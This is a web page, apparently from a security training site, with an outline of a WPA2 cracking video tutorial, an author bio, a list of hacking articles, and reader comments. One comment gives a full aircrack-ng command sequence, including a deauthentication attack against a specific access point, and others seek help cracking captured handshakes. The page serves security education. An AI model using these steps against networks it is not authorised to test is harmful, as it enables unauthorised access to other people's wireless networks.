Cracking WPA2 Tutorial
In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by:
- Identifying an access point
- Capturing traffic from that access point
- Attempt to capture the handshake. We have two options for doing this.
- We can wait for a client to connect on their own
- We can run a deauth attack to force them to disconnect and then you can capture the handshake then
.
Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there.
Enjoy.
Uh-oh!
We've encountered a new and totally unexpected error.
Get instant boot camp pricing
Thank you!
A new tab for your requested boot camp pricing will open in 5 seconds. If it doesn't open, click here.
Andrew Whitaker
Andrew Whitaker is a Senior Instructor for both the InfoSec Institute and the Intense School. He is also a nationally recognized expert on information security. He has performed penetration tests on numerous financial institutions throughout the United States and has been a regular consultant to government agencies on cyber security.He is also the author of several best-selling security and networking books, including "Penetration Testing and Network Defense" (Cisco Press), "Cisco Router Configuration Handbook" (Cisco Press), and "Chained Exploits: Advanced Hacking Attacks From Start to Finish" (Addison-Wesley). He is also a frequent conference speaker and has given talks on ethical hacking at Defcon, Chicagocon, SecurePhilly, and TakeDownCon. Whitaker also holds a Master’s Degree in Computer Science. He has trained the military, government defense contractors, and intelligence agencies on cyber security, risk management, ethical hacking, reverse engineering and exploit development.
- Cracking WPA2 Tutorial
- How to build a hook syscall detector
- Top tools for password-spraying attacks in active directory networks
- NPK: Free tool to crack password hashes with AWS
- Tutorial: How to exfiltrate or execute files in compromised machines with DNS
- Top 19 tools for hardware hacking with Kali Linux
- 20 popular wireless hacking tools [updated 2021]
- 13 popular wireless hacking tools [updated 2021]
- Man-in-the-middle attack: Real-life example and video walkthrough [Updated 2021]
- Decrypting SSL/TLS traffic with Wireshark [updated 2021]
- Dumping a complete database using SQL injection [updated 2021]
- Hacking clients with WPAD (web proxy auto-discovery) protocol [updated 2021]
- Hacking communities in the deep web [updated 2021]
- How to hack android devices using the stagefright vulnerability [updated 2021]
- Hashcat tutorial for beginners [updated 2021]
- How to hack a phone charger
- What is a side-channel attack?
- Copy-paste compromises
- Hacking Microsoft teams vulnerabilities: A step-by-step guide
- PDF file format: Basic structure [updated 2020]
- 10 most popular password cracking tools [updated 2020]
- Popular tools for brute-force attacks [updated for 2020]
- Top 7 cybersecurity books for ethical hackers in 2020
- How quickly can hackers find exposed data online? Faster than you think …
- Hacking the Tor network: Follow up [updated 2020]
- Podcast/webinar recap: What’s new in ethical hacking?
- Ethical hacking: TCP/IP for hackers
- Ethical hacking: SNMP recon
- How hackers check to see if your website is hackable
- Ethical hacking: Stealthy network recon techniques
- Getting started in Red Teaming
- Ethical hacking: IoT hacking tools
- Ethical hacking: BYOD vulnerabilities
- Ethical hacking: Wireless hacking with Kismet
- Ethical hacking: How to hack a web server
- Ethical hacking: Top 6 techniques for attacking two-factor authentication
- Ethical hacking: Port interrogation tools and techniques
- Ethical hacking: Top 10 browser extensions for hacking
- Ethical hacking: Social engineering basics
- Ethical hacking: Breaking windows passwords
- Ethical hacking: Basic malware analysis tools
- Ethical hacking: How to crack long passwords
- Ethical hacking: Passive information gathering with Maltego
- Ethical hacking: Log tampering 101
- Ethical hacking: What is vulnerability identification?
- Ethical hacking: Breaking cryptography (for hackers)
- Ethical hacking: Attacking routers
- Ethical hacking: Lateral movement techniques
- Linux for ethical hackers 101
- Ethical hacking: Buffer overflow
- Top five remote access trojans
hi Andrew Whitaker,
My name is Chris.
This video is fine but the main thing i want to know how i can crack the WPA/WPA2 without a dic attack.
i tried to use the JTR with the switch INCREMENTAL pipe with jtr.i left it for 5 HOURS but no use.
whatelse i can do ? because the dic file dosnt work all the time but most of the time.
Can u Plz try to find something without dic attack.
cannt we brutforce wpa randomly?
one more thing , can you tell me where i can find the max table of rainbow table.i want to buy.
cheers
chris
Andrew’s final comment in the video is “You can’t trust the security of WPA2”, a conclusion which he draws partly on the awful tendancy of users (and even administrators) to choose truly weak WPA/WPA2 passphrases, and more completely on the existence of rainbow tables.
There’s a nice article here http://www.renderlab.net/projects/WPA-tables/ about rainbow tables. In summary, there are available rainbow tables in the size of about 33GB which can be downloaded or purchased, and which contain tables for 1 million “words” pre-hashed over the top 1000 most common access point names. (There may be other, even larger and more complete rainbow tables available).
But, still, this relies on the confluence of a moderately common access point name and insufficiently strong passphrase.
I submit that it’s not that you can’t trust the security of WPA2, it’s that almost any security system can be used insecurely.
1. Choose something either random, or very unusual, for your access point name. e.g. “John&Fr3d’z !ccess_p[]1nt_” (I tried, and failed, to find an RFC describing the explicit rules for access point names, but it seems likely that a name could be chosen which is both descriptive and unlikely to appear in the rainbow tables)
2. Choose long, complex passphrases, preferably random, or again as above very unusual (and, due to rainbow tables, in this case “unusual” must go well beyond just “H8cker_sp3ak”).
.. or have the rainbow tables become so good and so available that there is, for practical purposes, no adequately secure combination of SSID and passphrase?
It is truly a great and useful piece of information. I’m satisfied that you simply shared this helpful info with us. Please keep us up to date like this. Thank you for sharing.
It’d be great if these programs could be run in Windows and/or if they could be entirely from an .exe file. I cracked a WEP key using Backtrack 4 and a Hawking usb wireless adapter, but that source has since left the building. I tried BT3 and BT5 but they didn’t play nice with my wireless adapter for some reason. It’s not like doing it is hard or anything, it’s just getting used to the command line, and knowing that one wrong character and you have to type the whole line over again. That’s annoying.
I don’t have a gpu accelerated cracking machine. I have tried some dictionary attacks but it didn’t work. If anyone would be willing to help me crack this WPA handshake?
http://www.mediafire.com/?d5xjpi3857st2xo
meThanks in anticipation
My email id is http://www.google.com/recaptcha/mailhide/d?k=01qjEzTMSs43bbrpJYYqgQlQ==&c=6td13CjLr6kTmdcCz_k_-srrHf_T0AMEejqb9wOfY1Y=
Hey general,
I’d suggest grabbing the guide at http://www.majestysecurity.com – It covers basic and advanced attacks on all types of WIFI networks..
Also you can use online GPU-accelerated services (http://www.gpuhash.com for example) for fast cracking. Tried this one last week and have one password revealed (from 3 handshakes, tough).
where to download without CD
What if the password isn´t in any worlist or rainbow table? Is there a way to reverse engineer the handshake?
hai, may i ask how to crack wpa2/wpa with backtrack 4 -r1? because i cant capture the wpa handshake. Normally i do with tis step…
1.airmon-ng
2.airmon-ng start wlan
3.airodump-ng mon0
4.clear
5. airmon-ng stop mon0
6.airmon-ng start wlan0 1
7.clear
8.airodump-ng -c 1 –bssid d8:5d:4c:e6:f3:04 -w wpa mon0
9.aireplay-ng -0 3 -a d8:5d:4c:e6:f3:04 -c 04:48:4c:ff:ff:fe mon0
10.aircrack-ng -w mypass.txt wpa-01.cap
when i do the step between step 8 and 9 the handshake capture didnt appear, i hv wait for a long time about 4 hour but still no appear.
but i hv note tat the psk hv change to mgt after i do step 9.
can u help me see if my step is wrong?can give me ur step ?